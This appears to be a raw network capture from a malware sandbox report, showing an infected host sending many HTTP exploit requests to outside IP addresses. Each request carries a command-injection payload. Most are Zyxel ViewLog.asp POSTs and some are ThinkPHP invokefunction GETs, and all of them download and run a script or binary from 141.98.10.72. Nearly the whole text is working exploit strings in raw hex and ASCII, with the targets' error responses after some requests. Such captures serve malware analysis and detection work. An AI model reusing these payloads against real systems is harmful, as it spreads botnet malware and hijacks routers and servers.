                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            551192.168.2.235594494.64.23.1858080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:10.295844078 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            552192.168.2.235052631.136.197.658080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:10.968503952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:14.169023037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.312134981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.342562914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:56.915028095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:46.060302019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            553192.168.2.233950231.136.106.2528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:11.169946909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:11.801316023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:13.049127102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:15.708746910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.828033924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:30.806653976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:50.771892071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:31.726170063 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            554192.168.2.234021095.98.145.1338080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:11.183389902 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:11.392836094 CET88INHTTP/1.0 400 Bad Request
                                                            Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                            Data Ascii: Client sent an HTTP request to an HTTPS server.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            555192.168.2.236014694.19.177.1518080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:11.193221092 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:11.418859005 CET337INHTTP/1.1 405 Not Allowed
                                                            Server: Web server
                                                            Date: Wed, 14 Feb 2024 08:29:10 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 155
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            556192.168.2.233937462.29.11.2118080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:11.218368053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            557192.168.2.235241031.200.96.1648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:11.220076084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            558192.168.2.235590294.187.103.1428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:11.225137949 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            559192.168.2.2339760112.126.71.7280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:12.675045013 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:13.031665087 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            560192.168.2.233511495.217.236.8680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:12.895189047 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:13.115848064 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:29:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            561192.168.2.234660095.97.189.18280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:12.905469894 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:13.138063908 CET392INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:13 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            562192.168.2.235485295.48.59.23480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:12.927921057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:13.184269905 CET138INHTTP/1.1 505 HTTP Version Not Supported
                                                            Server: Apache-Coyote/1.1
                                                            Date: Wed, 14 Feb 2024 08:29:13 GMT
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            563192.168.2.236098095.57.131.2880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:12.964637995 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:13.255577087 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:29:13.255842924 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            564192.168.2.235598862.162.105.2548080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:14.755178928 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:14.989801884 CET1173INHTTP/1.1 404 Not Found
                                                            Server: Apache-Coyote/1.1
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Language: en
                                                            Content-Length: 989
                                                            Date: Wed, 14 Feb 2024 08:29:14 GMT
